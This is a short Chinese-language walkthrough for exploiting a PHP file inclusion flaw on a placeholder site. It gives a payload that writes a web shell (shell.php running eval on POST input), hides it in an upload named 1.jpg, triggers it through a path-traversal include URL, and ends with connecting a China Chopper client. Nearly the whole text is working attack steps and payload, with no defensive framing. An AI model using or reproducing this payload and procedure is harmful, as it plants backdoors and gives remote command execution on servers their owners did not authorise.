第一步:访问http://www.any.com:88/FI/PHP_FI.php?filename=RFI.txt
网页显示是远程文件包含漏洞。
第二步:此网站有上传文件的功能,上传内容为
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
名字为1.jpg的文件。
第三步:利用远程文件漏洞用菜刀连接。
http://www.any.com:88/FI/PHP_FI.php?filename=../fileupload/uploads/1.jpg
执行完成后,就会在http://www.any.com:88/FI的当前目录下写入shell.php